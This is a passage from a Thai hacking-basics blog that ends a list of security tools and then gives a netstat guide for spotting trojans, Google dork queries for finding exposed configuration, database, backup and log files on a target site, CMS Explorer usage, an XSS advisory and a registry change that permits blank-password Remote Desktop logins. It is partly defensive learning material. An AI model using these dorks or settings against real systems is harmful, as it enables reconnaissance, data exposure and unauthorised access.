เป็น เครื่องมือช่วยใน การวิเคราะห์เครือข่าย โดยจะมีการทำงานคล้ายกับโปรแกรม Traceroute โดยวิเคราะห์แพ็กเกตที่ตอบสนองจาก Router เพื่อตรวจสอบรูปแบบของเครือข่าย และตรวจสอบการกรองข้อมูลของ Router โปรแกรมนี้แจกให้ใช้งานฟรี แต่มีเฉพาะบนระบบปฏิบัติการตระล Unix เท่านั้น

20) Strobe
โปรแกรมประเภทสแกนพอร์ต (Port Scanner) ซึ่งแม้ว่าจะไม่มีความสามารถขนาดโปรแกรม NMAP แต่ก็มีการทำงานที่รวดเร็ว

21) L0pht Crack 
โปรแกรมนี้เป็นโปรแกรมแคร็ก (Crack) รหัสผ่านบนระบบ Windows โดยโปรแกรมนี้ออกแบบมาเพื่อแก้ปัญหาในเรื่องของผู้ใช้ที่ชอบตั้งรหัสผ่านให้เดาง่าย โดยโปรแกรมนี้จะทำการเดารหัสผ่านผู้ใช้ เพื่อหาว่าผู้ใช้คนใดตั้งรหัสผ่านเอาไว้ง่ายเกินไป หรือเอาไว้หารหัสผ่านของผู้ใช้ที่ลืมรหัสผ่าน ดังนั้นโปรแกรมนี้จึงมีประโยชน์มาก อย่างไรก็ตามโปรแกรมนี้ไม่ฟรี โดยมีราคา 350 ดอลลาร์ แต่มีเวอร์ชันให้ทดลองใช้ก่อน

<...John the Ripper โปรแกรมแคร็กพาสเวิร์ดอันโด่งดัง คุณสามารถดาวน์โหลดได้ที่ www.openwall.com/john/...>

22) John the Ripper โปรแกรมนี้จัดได้ว่าเป็นโปรแกรม Crack รหัสผ่านที่โด่งดังมากที่ สุดในวงการ โปรแกรมนี้ สามารถทำงานบนระบบปฏิบัติการส่วนใหญ่ได้ การทำงานจัดว่าเร็วมาก แถมยังแจกซอร์สโค้ดด้วย โปรแกรมแบบนี้ไม่ได้ใช้ในทางร้ายอย่างเดียวนะครับ เพราะคุณสามารถนำไปตรวจสอบกับผู้ใช้ของคุณ ว่าตั้งรหัสผ่านให้เดาได้ง่ายหรือไม่ แถมแจกฟรีอีกด้วย

23) Hunt 
โปรแกรมนี้จัดว่าเป็นอันตรายอย่างมาก เพราะโปรแกรมนี้สร้างขึ้นเพื่อการขโมย Session หรือที่เรียกเป็นภาษาอังกฤษว่า Session Hijacking โดยโปรแกรมนี้จะทำทุกอย่างโดยอัตโนมัติ จนทำให้เทคนิคการขโมย Session ที่ยุ่งยาก กลายเป็นสิ่งที่ทุกคนทำได้ไปเลย โปรแกรมนี้สามารถขโมย Session ได้ทั้งบน Hub และ Switch (อย่าคิดว่าใช้ Switchแล้วปลอดภัย 100 เปอร์เซ็นต์นะครับ) สำหรับการป้องกันแฮกเกอร์ทำการขโมย Session ที่สมบูรณ์นั้น ก็ต้องใช้วิธีการเข้ารหัส สำหรับโปรแกรม Hunt เป็นของฟรีครับ แถม Sourcecode มาให้อีกต่างหาก

24) OpenSSH 
เครื่องมือนี้ใช้ในการสร้างช่องทางสื่อสารที่มีการเข้ารหัส ซึ่งจะทำให้ข้อมูลที่สื่อสารในเครือข่ายมีความปลอดภัยต่อการดัก จับข้อมูล โปรแกรมนี้ทำงานบนระบบปฏิบัติการตระลยูนิกซ์ โดยมักใช้กับโปรแกรม Telnet หรือ FTP แต่เครื่องมือนี้ก็เปิดโอกาสให้ผู้ใช้นำไปรักษาความปลอดภัยให้ช่องทางสื่อสารอื่นๆ ได้ด้วย

25) TCP Wrapper 
เครื่องมือนี้ทำงานบนระบบปฏิบัติการ Unix เช่นเดียวกัน โดยโปรแกรมนี้จะทำหน้าที่เก็บข้อมูลการติดต่อมายัง Server ผ่านโปรแกรมต่างๆ เช่น Telnet, FTP นอกจากนั้นยังสามารถกรอง (Filter) การเข้าใช้ ให้สามารถเข้าใจจากเครื่องที่กำหนดไว้เท่านั้นก็ได้ นับเป็นเครื่องมือหนึ่งที่มีการใช้งานกันมาก

26) NTop 
เป็นโปรแกรมแสดงข้อมูลการใช้งานเครือข่ายบนจอภาพ โดยสามารถ แสดงสถิติการใช้งานได้หลายแบบ สามารถแยกตามเครื่องได้ นอกจากนั้นยังสามารถเรียกดูผ่านเว็บได้อีกด้วย

27) Traceroute / Ping /Telnet 
อันที่จริง 3 โปรแกรมนี้ก็เป็นเครื่องมือใช้งานทั่วๆ ไป และสามารถใช้งานได้กับเครื่องคอมพิวเตอร์ทั่วๆ ไป แต่เนื่องจากมีการใช้งานมาก จึงได้รับการจัดอันดับด้วย สำหรับโปรแกรม Traceroute นั้นในวินโดวส์ใช้ชื่อว่า Tracert

28) NAT (NetBIOS Auditing Tools) 
โปรแกรมนี้มีหน้าที่ตรวจสอบเครื่องคอมพิวเตอร์ในเครือข่าย โดยจะตรวจสอบเฉพาะเครื่องที่รันระบบปฏิบัติการ Windows ว่ามีเครื่องใดมีการ Share Folder เอาไว้บ้าง และตรวจสอบต่ออีกว่าในการแชร์นั้นได้กำหนดสิทธิในการเข้าถึงที่ มีความปลอดภัยเพียงพอหรือไม่ เพราะผู้ใช้ส่วนใหญ่มักจะมีการแชร์แบบเต็มที่ (Full Share) ซึ่งอาจทำให้เป็นช่องทางในการโจมตีของแฮ็กเกอร์ได้

29) Scanlogd 
เป็นโปรแกรมที่ทำงานในระบบปฏิบัติการ Unix โดยทำหน้าที่ตรวจสอบการถูก  Hacker (แฮกเกอร์) ทำการ Scan port แต่เนื่องจากโปรแกรมนี้ค่อนข้างเก่า และมีโปรแกรมอื่นที่มีความสามารถมากกว่า จึงไม่เป็นที่นิยมมากนัก

30) Sam Spade
เป็นโปรแกรมสำหรับตรวจสอบ IP Address เพื่อหาคนที่ปลอมหมายเลข IP

31) NFR 
เป็นโปรแกรมตรวจจับผู้บุกรุกที่มีชื่อเสียงพอควร มีทั้งส่วนที่ตรวจจับ Hacker - แฮกเกอร์ ผู้บุกรุกทางเครือข่าย และตรวจจับผู้บุกรุกในเครื่องคอมพิวเตอร์

32) Logcheck 
เป็นโปรแกรมที่ทำหน้าที่ ตรวจจับ การเปลี่ยนแปลงของไฟล์ Log ทั้งนี้เนื่องจากพฤติกรรมอย่างหนึ่งของแฮ็กเกอร์หลังจากที่เข้า สู่ระบบแล้ว มักจะมีการลบร่องรอยของตนเองที่บันทึกไว้ใน Log ซึ่งโปรแกรมนี้จะช่วยให้ตรวจสอบได้ ว่ามีการเปลี่ยนแปลงเกิดขึ้น ซึ่งอาจเกิดจากแฮ็กเกอร์ก็ได้

33)  Perl 
เป็นภาษาสคริปต์อเนกประสงค์ ส่วนใหญ่เรามักรู้จักว่าเป็นภาษาหนึ่งที่ใช้เขียนเว็บได้ แต่อันที่จริง Perl เป็นภาษาที่ใช้ได้หลายอย่าง ซึ่งผู้ดูแลระบบที่เก่งๆ ก็มักจะเขียนสคริปต์เก่งอีกด้วย

<...Perl มุกมณีซ่อนเร้นที่มีความสามารถทางด้านสคริปต์มากมาย หาข้อมูลเพิ่มเติมได้ที่ www.perl.org...>

34) Ngrep 
ใช้ตรวจจับเพื่อหาข้อมูลที่ต้องการที่วิ่งผ่านเครือข่าย คล้ายกับการหาข้อความในฮาร์ดดิสก์ แต่นี่เป็นการหาในเครือข่าย เช่น จะหาคำว่า password โปรแกรมนี้ก็จะดักจับเฉพาะแพ็กเกจที่มีคำว่า password มาให้ ทำให้โปรแกรมนี้สามารถนำไปใช้งานได้ทั้งการป้องกันและการโจมตี

35)  Cheops__ 
เครื่องมือนี้ทำหน้าที่เป็นส่วนติดต่อกับผู้ใช้ให้กับโปรแกรมต่างๆ ที่ต้องการแสดงผลในรูปแบบของผังเครือข่าย ขณะนี้ผู้พัฒนากำลังหาอาสาสมัครรับช่วงดูแลโปรแกรมนี้ต่อ ใครสนใจก็ติดต่อได้นะครับ

36) Vetescan 
เป็นโปรแกรมที่ทำหน้าที่สแกนหาจุดอ่อนในเครื่องคอมพิวเตอร์ โดยสามารถสแกนได้ทั้งคอมพิวเตอร์ตระลยูนิกซ์และตระล Windows

37) Retina 
เป็นโปรแกรมตรวจหาจุดอ่อนในเครื่องคอมพิวเตอร์อีกโปรแกรมหนึ่ง ที่มีชื่อเสียง แต่โปรแกรมนี้เป็นโปรแกรมเชิงพาณิชย์ ดังนั้นหากใครจะใช้ก็ต้องเสียเงินครับ

38) Libnet 
เป็นเครื่องมือในลักษณะของ API คือจะต้องเขียนโปรแกรมเพื่อเรียกใช้อีกทีหนึ่ง โดย Libnet จะทำให้เราสามารถเขียนโปรแกรม เพื่อสร้างแพ็กเกตส่งไปในเครือข่ายได้ง่ายขึ้น โดยข้อดีของแพ็กเกจที่สร้างโดย Libnet คือเป็นการสร้างที่ระดับต่ำ (Low-level Packet) ดังนั้นเราสามารถสร้างแพ็กเกจอะไรก็ได้ ได้ทั้งแพ็กเกจปกติและไม่ปกติ ทำให้สามารถนำไปสร้างแพ็กเกจที่ทดสอบและโจมตีได้

39) Crack / Cracklib 
เป็นโปรแกรมแคร็กรหัสผ่านอีกตัวหนึ่ง เป็นที่นิยมพอควร แต่ทำงานได้กับระบบปฎิบัติการตระล Unix เท่านั้น

40) Cerberus Internet Scanner 
เป็นโปรแกรมที่ทำหน้าที่ตรวจสอบหาจุดบกพร่องของคอมพิวเตอร์ผ่า นทางเครือข่าย โดยโปรแกรมนี้ทำงานบนระบบปฏิบัติการ Windows NT หรือ Windows 2000 โปรแกรมนี้แจกฟรีอีกเช่นกัน

41) OpenBSD 
เป็นระบบปฏิบัติการตระล Unix (ไม่ใช่ Linux) โดยเป็นระบบปฏิบัติการที่ได้ชื่อว่าปลอดภัยมากที่สุดตัวหนึ่ง เพราะความปลอดภัยเป็นเป้าหมายหลักของผู้สร้างอยู่แล้ว ดังนั้นหากต้องการระบบปฏิบัติการที่สามารถวางใจได้ ระบบปฏิบัติการนี้คงไม่ทำให้ผิดหวัง ข้อเสียของระบบปฏิบัติการนี้ คือใช้งานยากกว่า Linux และหาเอกสารคู่มือการใช้งานอ่านได้ยากกว่า

42) Nemesis 
เป็นเครื่องมือที่ใช้ในการสร้างแพ็กเกต โดยเรียกใช้จาก Shell Script บนระบบ Unix

43) LSOF 
ย่อมาจาก List Open Files โดยเป็นเครื่องมือบน Unix เพื่อแสดงไฟล์ที่เปิดใช้งานอยู่

44) Lids 
เป็นโปรแกรมป้องกันการบุกรุก(Hacker) เฉพาะส่วนเคอร์เนลของ Linux ทั้งนี้เพื่อป้องกันไม่ให้มีการใช้งานเป็นผู้ดูแลระบบ แต่หากผู้ดูแลระบบตัวจริงต้องการเข้าใช้งาน ก็จะต้องยกเลิกการทำงานของ Lids เสียก่อน

45) IPTraf 
เป็นโปรแกรมดักจับแพ็กเกจและแสดงผลที่จอภาพ สามารถแสดงการใช้งาน แสดงโพรโตคอลต่างๆ ได้

46) IPLog 
เป็นโปรแกรมที่คอยตรวจสอบการสแกนและการโจมตีของ Hacker , แฮกเกอร์
ผ่านเครือข่าย

47) Fragrouter 
โปรแกรมสร้างแพ็กเกต เพื่อตรวจสอบการทำงานของโปรแกรมตรวจจับการบุกรุก (IDS)

48) Queso
 เป็นโปรแกรมที่ทำการตรวจสอบระบบปฏิบัติการของเครื่องเป้าหมาย โดยวิธี Stack Fingerprint ซึ่งปัจจุบันมักใช้โปรแกรม NMAP มากกว่าเพราะทำงานได้ครอบคลุมกว่า

49) GPG/PGP 
โปรแกรมสำหรับเข้ารหัสและตรวจสอบข้อมูล โดยเลียนแบบการทำงานมาจากโปรแกรม PGP แต่แจกฟรี

ผม หวังว่าคงจะเป็นประโยชน์ เพราะอย่างน้อยก็จะได้ทราบว่าเขามีการใช้เครื่องมืออะไรกันบ้าง และโปรแกรมส่วนใหญ่ก็เป็นโปรแกรมที่แจกฟรี หลายๆ คนที่ไม่มีงบประมาณจะได้ทดลองนำมาใช้งานกับระบบของตัวเอง ก็หวังว่าจะได้ประโยชน์กันตามสมควรจากบทความนี้ แม้ว่าหลังๆ จะเขียนแบบย่อๆ เพระผมเห็นว่าเครื่องมือเหล่านี้ ไม่นิยมใช้มากเหมือนกับในครึ่งแรก สำหรับหลักการทำงานของโปรแกรมประเภทต่างๆ

เท่า ที่แนะนำมาก็คงจะพอเห็นภาพแล้วนะครับว่า เครื่องมือทางด้าน Security นี่ต้องบอกว่าเกิดจาก Unix เป็นส่วนใหญ่จริงๆ โดยเฉพาะเครื่องมือในชุดนี้ ล้วนแล้วแต่ทำงานใน Unix เป็นส่วนใหญ่ ทั้งนี้เนื่องจากเขาไปสำรวจจากคนที่ใช้ Unix ก็คงต้องได้ผลลัพธ์แบบนี้แหละครับ แต่ที่ผมนำมาแนะนำก็เพราะเห็นว่าส่วนใหญ่เป็นของฟรีที่ไม่ต้องเสียเงิน

แต่ ถึงแม้ว่าเครื่องมือด้าน Security มักจะอยู่บน Unix แต่ขณะนี้มีแนวโน้มอย่างมากที่เครื่องมือเหล่านี้ จะพอร์ตขึ้นมาทำงานบน Windows ดังจะเห็นได้จากซอฟต์แวร์ที่นิยมเป็นอันดับแรกๆ หลายโปรแกรมก็มีให้ใช้งานบน Windows แล้ว ดังนั้นในอนาคตซอฟต์แวร์พวกนี้ก็จะย้ายมาอยู่บน Windows มากขึ้น แต่หากใครใจร้อนไม่อยากรอ และไม่เคยใช้ Unix มาก่อน ก็ขอบอกว่าทดลองใช้เถิดครับ เพราะ Unix อย่าง Linux ปัจจุบันมีการใช้งานที่ง่ายมากขึ้นเรื่อยๆ อย่าง Redhat นี่ก็ง่ายมาก ตั้งแต่การติดตั้งที่เป็นอัตโนมัติไม่แพ้การติดตั้ง Windows เลย ปัญหาเรื่องไดรเวอร์ก็ไม่มีอีกต่อไปแล้ว การใช้งานก็เป็นกราฟิกที่หน้าตาคล้ายๆ กับวินโดวส์ ผมเชื่อว่าลองใช้สัก 1-2 สัปดาห์ ก็น่าจะใช้งานได้คล่องเพียงพอที่จะใช้เครื่องมือเหล่านี้แล้ว

(Webmaster: หรือถ้าจะลองเล่นระบบ Linux ก็ทดลองติดตั้งพวก CentOS หรือ Ubuntu ก็ได้ครับ เพราะ Redhat นี้เสียตังค์แล้ว หรือพวก BSD ก็แนะนำให้เล่น FreeBSD ครับ)


[[ CREDIT ]]
อาจารย์ธนา หงษ์สุวรรณ 
อาจารย์ประจำภาควิชาวิศวกรรมคอมพิวเตอร์
สถาบันเทคโนโลยีพระจอมเกล้าเจ้าคุณทหารลาดกระบัง
ที่มา : http://www.sysnetcenter.com/board/index.php?topic=214.0
Read more

+ Hack tools Online +

Enjoy :)

www.pentest-tools.com

Reconnaissance
Google Hacking
Find Subdomains
Find VHosts
DNS Zone Transfer
DNS Lookup
Whois Lookup

Scanning&Enumeration
Ping sweep
TCP port scan
UDP port scan
Web app discovery
URL Fuzzer
XSS Server

Vulnerability scanning
Web Server Scan
CMS Version Scan
SSL Heartbleed
Password Cracking
Password Cracker
Read more

พื้นฐานแฮกเกอร์ ตอน ตรวจสอบแฮกเกอร์และโทรจัน

พื้นฐานการป้องกันตัวของแฮกเกอร์ - ฉบับ basic-hack

สำหรับแฮกเกอร์มือใหม่ที่ไม่รู้จัก CMD หรือ (Command Prompt) - CMD บน Windows นั้น..ไม่ใช่ระบบปฏิบัติการ DOS ในยุคเก่าแก่แต่อย่างใด แต่เป็นการจำลองระบบปฏิบัติการ DOS ไว้ในเครื่องเรา เพื่อการใช้งานแบบ Command Line หรือใช้งานคำสั่งแบบบรรทัดเดียว....เพื่อสามารถเข้าถึงการทำงานในระดับลึกๆของระบบปฏิบัติการที่เราใช้นั่นเอง....

การตรวจสอบด้วยคำสั่ง NETSTAT สามารถเช็คหา IP ที่เชื่อมต่อเข้ามาในเครื่อง
หมายความว่า สามารถเช็คได้ในระยะที่คุณกำลัง "โดนแฮก" หรือเผลอไปคลิกไฟล์โทรจัน ลฯล
หรือจะนำไปใช้ตรวจสอบแบบ Real Time และสังเกตุเพื่อระวังภัยได้ทุกวินาที

วิธีเรียกใช้ CMD ใน Windows
กดปุ่ม Window + R เพื่อเรียก Run  > พิมพ์ cmd  > ENTER
########################################################################
คำสั่ง netstat
ใช้เช็คการเชื่อมต่อต่างๆระหว่างเรากับเครื่องอื่น เลือกใช้ได้ทั้ง netstat -a หรือ netstat -n ตามต้องการ
แต่เราจะใช้คำสั่ง netstat -ano 5  คือ การเช็คทุกๆ 5วินาที และแสดง Process ID ด้วย

เช็คแบบเจาะจง STATE ทุกๆ5วินาที
netstat -ano 5 |find /i "established"
netstat -ano 5 |find /i "listening"

########################################################################



การตรวจสอบ IP และ Port ที่น่าสงสัย

Local Address คือ IP ฝั่งเรา และ PORT ที่ใช้งานให้สังเกตุหมายเลขพอร์ตแปลกๆที่เปิด
Foreign Address   คือ IP ที่เข้ามาติดต่อรับส่งข้อมูลกับเครื่องเรา(อาจเป็นไอพีของแฮกเกอร์)
PID  คือ หมายเลข Process ID

ในแถบ STATE หรือสถานะการติดต่อหลักๆที่เรามักจะเห็น
ESTABLISHED   คือ สถานะที่กำลังติดต่อ รับหรือส่ง ข้อมูลกับเรา
..แต่ไม่ได้หมายความว่า จะมี "แฮกเกอร์แฮกเข้ามาในเครื่องเราซะเสมอไป
....อาจเป็นได้ทั้ง IP เว็บที่คุณกำลังเปิด , โปรแกรมที่กำลังรันอยู่บนเครื่อง ลฯล
LISTENING   คือ สถานะรอการติดต่อ
หลักๆแล้วเราจะเจอแค่ 2 สถานะนี้  เพิ่มเติมสามารถอ่านได้ที่ท้ายบทความครับ

ปล.ตอนทดสอบให้เราปิดเบราเซอร์ , เกมส์ , โปรแกรม ลฯล ที่ใช้การติดต่อทางอินเตอร์เน็ต
ออกทั้งหมดแล้ว จะเห็น IP ที่น่าสงสัยง่ายขึ้น

########################################################################

ถึงขั้น..ตามถอนรากถอนโคน

โดยการนำ PID ของการเชื่อมต่อที่น่าสงสัยไปเช็คใน Task Manager  
กด CTRL+ALT+DELETE เปิด Task Manager ขึ้นมา ....ในแถบ Processes หา PID ที่สงสัย และเราจะได้ไฟล์ที่มาของการเชื่อมต่อ...หลังจากนั้นลองคลิกขวาเลือก Properties เพื่อดูที่อยู่ไฟล์ 
หรือทำการ End Procress ทิ้งไปก่อนถ้ามั่นใจว่าเป็นไฟล์อันตราย

Window + R เพื่อเรียก Run  > regedit > Enter 
และไปที่ edit > find > ใส่ชื่อไฟล์ที่เราสงสัย
เมื่อเจอและมั่นใจว่ามันคือ โทรจัน หรือ Backdoor ให้ลบทิ้ง 
และอย่าลืมตามไปเซิสหาเพื่อลบในไดว์ C:/ D:/
รวมทั้งเช็ค Window Start up โดยการไปที่ Start > Run > Msconfig ในแถบ Startup


########################################################################
แหล่งข้อมูลเพิ่มเติมเรื่อง TCP STATE
- TCP Connection States and Netstat Output - http://support.microsoft.com/kb/137984 
- STATE ต่างๆของคำสั่ง netstat  - http://www.thaiadmin.org/board/index.php?topic=16686.0
########################################################################
บทความ - ak1 -www basic-hack.blogspot - ดอทคอม
########################################################################

Read more

พื้นฐานแฮกเกอร์ - ตอน แฮกเว็บด้วยGoogle &[Online Pentest Tools]

แฮกเกอร์ แฮกเว็บยังไง ใช้อะไรแฮกเว็บ ถ้าอยากเริ่มต้นกับ แฮกเกอร์ หรือนักทดสอบความปลอดภัยของระบบ

แฮกเว็บ
credit photo webmonkey.com

ขั้นตอนแรกที่ แฮกเกอร์ สำรวจหากต้องการ แฮกเว็บไซต์นั้นๆ นั่นคือการใช้ Google ค้นหาข้อมูลของเว็บไซต์ 

และสามารถประยุกค์ใช้ในการหาแหล่งความรู้ ตามเรื่องที่ต้องการ เช่น สามารถใช้ Google เข้ามาช่วยในการค้นหาไฟล์เอกสาร หรือหน้าไดเรกทอรี่สำคัญที่แฮกเกอร์ สามารถเข้าถึงได้ อาธิเช่น แหล่งเก็บไฟล์เอกสารต่างๆ ...บางครั้งเราอาจพบข้อมูลที่เป็นประโยชน์ต่อการโจมตีของ แฮกเกอร์ เช่น กรณีแอดมินที่เก็บข้อมูลอะไรซักอย่างลงไฟล์ .txt หรือเอกสารอื่นๆ ที่ Google Bot  สามารถเข้าถึงได้จนถูกเจ้า Google Bot เก็บนำมาจัดลำดับแสดงผลบนเว็บ Google และยิ่งฝั่งแอดมินไม่มีการ Set Permission ,หรือป้องกันการเข้าชมจากบุคคลภายนอกด้วย จึงทำให้เป็นที่มาของการเขียนบทความนี้ เพราะเป็นวิธีที่ง่ายและไม่ต้องลงมือสแกนเว็บ หรือติดต่อกับเว็บไซต์เป้าหมายโดยตรง และอาจมีโอกาสเจอข้อมูลสำคัญๆได้

ปล.ส่วนใหญ่แฮกเกอร์หมวกดำ อาจจะใช้เพื่อกวาดเป้าหมายบน Google เสียมากกว่า
ในทางตรงกันข้ามของแฮกเกอร์ที่ฉลาด และอยากเข้าใจในการทำงานของระบบต่างๆ
ต้องการหาความรู้เพิ่มมักใช้คำสั่งเหล่านี้ในการหาแหล่งข้อมูลลับๆ ได้อย่างง่ายดาย

คำสั่งพื้นฐาน [สำคัญ]

ขั้นแรกแฮกเกอร์ล็อคเป้าหมายด้วยการใช้คำสั่ง
site:เป้าหมาย.com
คือการหาแบบเจาะจงเว็บ   เช่น  site:basic-hack.blogspot.com 

ซึ่งนิยมใช้ควบคู่กับคำสั่งด้านล่างต่อไปนี้

intitle:             หาตาม TITLE (ส่วนชื่อเรื่อง)
intext:             หาหน้าที่มีคำนี้  
inurl:               หา URLหรือลิงค์ของเว็บ เช่น inurl:webboard/admin.php
filetype:txt       หาไฟล์นามกสุล TXT     
ext:ini              หาไฟล์นามสกุล INI

อื่นๆ ลองประยุคใช้กันดูครับ
###############################################################
ค้นหาหน้า index.of หรือไดเรกทอรี่ที่เปิดไว้
site:target+intitle:index.of
###############################################################
ค้นหาไฟล์ที่เกี่ยวกับการตั้งค่าต่างๆ  (configuration files)
site:target+ext:xml+|+ext:conf+|+ext:cnf+|+ext:reg+|+ext:inf+|+ext:rdp+|+ext:cfg+|+ext:txt+|+ext:ora+|+ext:ini
###############################################################
ค้นหาไฟล์ที่เกี่ยวกับ database
site:target+ext:sql+|+ext:dbf+|+ext:mdb
###############################################################
ค้นหา log files
site:target+ext:log
###############################################################
ค้นหา backup files
site:target+ext:bkf+|+ext:bkp+|+ext:bak+|+ext:old+|+ext:backup
###############################################################
ค้นหาหน้า login
https://www.google.com/search?q=site:target+inurl:login
###############################################################
ค้นหาหน้าที่เกิด SQL Error ต่างๆ
https://www.google.com/search?q=target+intext:"sql syntax near" | intext:"syntax error has occurred" | intext:"incorrect syntax near" | intext:"unexpected end of SQL command" | intext:"Warning: mysql_connect()" | intext:"Warning: mysql_query()" | intext:"Warning: pg_connect()"
###############################################################
ค้นหาเอกสารที่เปิดเผย
site:target+ext:doc+|+ext:docx+|+ext:odt+|+ext:pdf+|+ext:rtf+|+ext:sxw+|+ext:psw+|+ext:ppt+|+ext:pptx+|+ext:pps+|+ext:csv
###############################################################
ค้นหาหน้า phpinfo
https://www.google.com/search?q=site:target+ext:php intitle:phpinfo "published by the PHP Group"
###############################################################
++++++++++ Online Service ++++++++++
###############################################################
[บทความ] AK1 - basic-hack.blogspot ดอทคอม
###############################################################
Read more

พื้นฐานแฮกเกอร์ ตอน โปรแกรมตรวจสอบเว็บไซต์ที่เป็น CMS

Cms explorer คือโปรแกรมที่แฮกเกอร์ นิยมใช้สำหรับค้นหา Component , Modules , Plugin , Theme ของเว็บไซต์ cms (เว็บไซต์สำเร็จรูป)



อันดับแรกอธิบายศัพท์ในบทความนี้ 
เป็นความรู้สำหรับมือใหม่กันก่อน

CMS (Content Management System) คือ
ระบบจัดการเนื้อหาที่พัฒนามาจากภาษาที่ใช้เขียนเว็บไซต์โดยทั่วไปอย่าง php,asp,jsp,python,perl ลฯล
ออกแบบมาแบบสำเร็จรูป ให้ผู้ที่ต้องการเปิดเว็บไซต์นำมาใช้งานกันได้ทันที และสะดวกรวมเร็ว มีความสามารถการจัดการข้อมูลตามประเภทของเว็บไซต์  โดยที่ผู้ติดตั้งไม่ต้องมีความรู้เรื่องการเขียนโปรแกรมมากนัก ปัจจุบันที่พบเจอบ่อยๆจนติดตา ก็คงเป็น Wordpress , joomla , drupal , SMF , discuz เป็นต้น  ( เพิ่มเติม CMS ที่พัฒนาโดยคนไทย http://www.cmsthailand.com )

CMS แต่ละตัวจะมี Extension ก็คือส่วนเสริมของแต่ละ cms
ซึ่งปกติ cms อย่าง joomla จะไม่มี Webboard มาให้ก็ต้องมาติดตั้งระบบเว็บบอร์ด..นี่คือ Extension เสริม

โดยในส่วน Extension เรียงจากส่วนที่ใหญ่ๆ ไปหาเล็ก
จะได้ > Component , Module , Plugin
==================================================
ความรู้เรื่อง Extensions 4 ประเภท = Component , Module , Plugin ,Template
==================================================

สรุปช่องโหว่ที่ทำให้แฮกเกอร์ สามารถแฮกเว็บไซต์ได้ 
อาจเกิดขึ้นได้ทั้ง 4 ส่วนนี้.....หากติดตั้งเพิ่มโดยไม่มีการเช็คช่องโหว่หรือทดสอบด้วยตัวเองก่อน *0*

ตัวอย่างช่องโหว่ที่เกิดขึ้นให้มองเห็นภาพ
(Joomla redSHOP Component 1.2 - SQL Injection)
(PHP-Nuke Module(SPChat) SQL Injection)
(Wordpress Formcraft Plugin - SQL Injection)

==================================================
Cms Explorer
เป็นเครื่องมือที่ใช้ในการค้นหาที่อยู่ของ Extension ทั้ง 4 ส่วนที่กล่าวมา
ที่สำคัญเป็นโปรแกรมภาษา perl  (.pl) ดังนั้นเพื่อให้ใช้งานไฟล์ .pl ได้ ต้องติดตั้ง ActivePerl กันก่อนครับ

ดาวน์โหลดจากเว็บไซต์ผู้พัฒนาตัวจริง
ลดความเสี่ยงการโดนแฮก
Download Cms Explorer
https://code.google.com/p/cms-explorer/
Download ActivePerl
http://www.activestate.com/activeperl

สำหรับแอดมินทั้งหลายควรตรวจสอบช่องโหว่ของส่วนเสริมก่อนติดตั้งด้วยครับ
แนะนำให้อ่านบทความนี้เพิ่มเติม > http://basic-hack.blogspot.com/2013/03/exploit-cms-plugin.html
==================================================
วิธีการใช้งาน CMS Explorer เบื้องต้น

/cms-explorer.pl -url www.wordpress.com -type wordpress
/cms-explorer.pl -url www.drupal.com -type drupal
/cms-explorer.pl -url www.joomla.com -type joomla

ปล.ถ้าอยากเก่ง แนะนำหัดแปลอังกฤษบ่อยๆนะจ๊ะ
https://code.google.com/p/cms-explorer/wiki/Usage
==================================================
บทความ ak1 - basic-hack.blogspot ดอทคอม
==================================================
Read more

ประกาศพบช่องโหว่ Wordpress Plugin - "All in One Seo Pack"

ประกาศพบช่องโหว่ XSS ของ Plugin Wordpress - "All in one Seo pack" ที่มีผู้ติดตั้งนับล้านเว็บไซต์

แฮก
All in one Seo pack

Security Researchers - Sucuri ผู้พบช่องโหว่ (XSS) - Cross Site Scripting
ปัจจุบันยังคงใช้ Plugin นี้กันอยู่มากกว่า 15 ล้านเว็บไซต์!

การโจมตีของแฮกเกอร์เพื่อเพิ่มและปรับเปลี่ยน Meta ของ WordPress เว็บไซต์
(ซึ่งในด้าน Seo - 'Meta' tag ถือว่าเป็นส่วนที่สำคัญมากๆ)  
ทำให้อันดับเว็บที่เคยติดอยู่บน Google หายไปได้ง่ายๆ

นอกจากนี้ช่องโหว่ XSS อาจทำให้แฮกเกอร์สั่งรันโค้ด JavaScript
ที่เป็นอันตรายบนแผงควบคุมของผู้ดูแลระบบ 

หมายความ ว่า แฮกเกอร์สามารถอาจฉีด รหัส JavaScript และทำสิ่งต่าง ๆ 
เช่นเปลี่ยนรหัสผ่านของผู้ดูแลระบบ และสามารถเข้ามาทำอะไรต่อได้อีกมาก

วิธีการแก้ไข ให้อัพเดทเป็น All in One SEO Pack 2.1.6

Translated by :  ThaiHacknews
Read more

Hack Remote Desktop ใน Window XP&Vista โดยไม่ต้องใช้พาสเวิร์ด

บทความนี้เพื่อให้มองเห็นภาพแฮกเกอร์แฮกเข้ามาควบคุมหน้าจอคอมพ์ของคนอื่นแบบไม่ต้องใส่รหัสผ่าน password ใดใด

remote desktop
hack remote desktop window xp and window vista

ก่อนอื่นเลย....ขออธิบายก่อนว่า Windows XP และ Windows Vista
จะมีการกำหนด Policy Set หรือข้อกำหนด ที่ แฮกเกอร์ สามารถเข้าไปแก้ไขค่าเพื่อปลดล็อครหัสผ่าน 
จากการเข้าสู่ระบบคอมพิวเตอร์ระยะไกลได้

( ค่าที่ว่านี้ถูกเก็บไว้ใน Registry key ชื่อ “LimitBlankPasswordUse” )
.....สรุปคือ แฮกเกอร์ สามารถเชื่อมต่อเข้ามาโดยไม่จำเป็นต้องมี ไม่มีรหัสผ่าน !! (งานเข้า)

===============================================================

ต่อมาเราจะลองเข้าไปแก้ไขให้ Account 
ให้มีค่าเป็น blank passwords (ค่าว่าง)ตามที่กล่าวมาด้านบน
โดยไปที่

Start > Run > พิม gpedit.msc >  ENTER

เมื่อเข้าสู่หน้าต่าง Group Policy ให้เข้าไปที่
Computer Configuration > Windows Settings > Security Settings > Local Policies > Security Options
ในแถบ Policy หา :  Accounts: Limit local account use of blank password to console logon only
ดับเบิ้ลคลิกเข้าไปและแก้ไขเป็น : Disabled

===============   เมื่อเขียนเป็นไฟล์ Registry (.reg) จะได้  ===============

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa] "LimitBlankPasswordUse"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] "LimitBlankPasswordUse"=dword:00000000

================   save to blank.reg   ================
.......สามารถใช้งานได้ทั้งบนระบบปฏิบัติการ 32-bit และ 64-bit ครับ  :)

ท้ายสุดเรามาลองกำหนด User สำหรับการ Remote
<คลิ๊กขวา>ที่ my computer > properties > remote 
ติ๊กถูกที่ allow users to remotely to this computer Full computer name:

